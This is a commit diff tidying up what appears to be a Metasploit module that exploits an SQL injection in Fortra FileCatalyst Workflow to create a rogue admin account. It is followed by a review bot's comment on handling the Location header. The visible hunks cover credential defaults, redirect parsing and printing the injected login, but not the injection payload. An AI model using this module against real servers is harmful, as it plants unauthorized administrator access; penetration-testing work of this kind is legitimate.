
Commit 8ad328a

committed
Code cleanup
Code cleanup
1 parent ea2b592 commit 8ad328a


1 file changed

+8
-10
lines changed

1 file changed

+8
-10
lines changed

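--- a/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb
+++ b/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb
@@ -37,7 +37,7 @@ def initialize(info = {})
 register_options([
 OptString.new('TARGETURI', [true, 'Base path', '/']),
 OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username]),
-OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),
+OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alphanumeric(16)]),
 OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])
 ])
 end
@@ -99,9 +99,8 @@ def run
 fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
 end
 
-raw_res = res.to_s
-if raw_res =~ /^Location:\s*(.+)$/
-location_value = ::Regexp.last_match(1).strip
+if res.headers['Location']
+location_value = res.headers['Location']
 print_status("Redirect #1: #{location_value}")
 else
 fail_with(Failure::UnexpectedReply, 'Location header not found.')
@@ -119,9 +118,8 @@ def run
 fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
 end
 
-raw_res = res.to_s
-if raw_res =~ /^Location:\s*(.+)$/
-location_value = ::Regexp.last_match(1).strip
+if res.headers['Location']
+location_value = res.headers['Location']
 print_status("Redirect #2: #{location_value}")
 else
 fail_with(Failure::UnexpectedReply, 'Location header not found.')
@@ -157,8 +155,8 @@ def run
 username = datastore['NEW_USERNAME']
 password = Digest::MD5.hexdigest(datastore['NEW_PASSWORD']).upcase
 email = datastore['NEW_EMAIL']
-firstname = Rex::Text.rand_text_alpha(1..6)
-lastname = Rex::Text.rand_text_alpha(1..6)
+firstname = Faker::Name.first_name
+lastname = Faker::Name.last_name
 areacode = rand(100..999)
 exchangecode = rand(100..999)
 subscribernumber = rand(1000..9999)
@@ -266,7 +264,7 @@ def run
 end
 
 print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}workflow/jsp/logon.jsp")
+print_good("Login at: #{full_uri(normalize_uri(target_uri, 'workflow/jsp/logon.jsp'))}")
 end
 
 end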
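Review bot: The new `if res.headers['Location']` check in the "Redirect #1" hunk (and the identical one for "Redirect #2") accepts an empty header value, because an empty string is truthy in Ruby, and it no longer applies the `.strip` that the removed regex branch did. An empty or whitespace-padded Location would then go into `location_value` instead of reaching the `fail_with(Failure::UnexpectedReply, ...)` branch. Reading the header once with `location_value = res.headers['Location'].to_s.strip` and branching on `if location_value.empty?` keeps the old trimming and removes the double lookup. Since both blocks are the same apart from the status message, a small private helper would avoid the duplication. The body of `run` extends beyond these hunks, so how `location_value` is used afterwards is not visible here.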
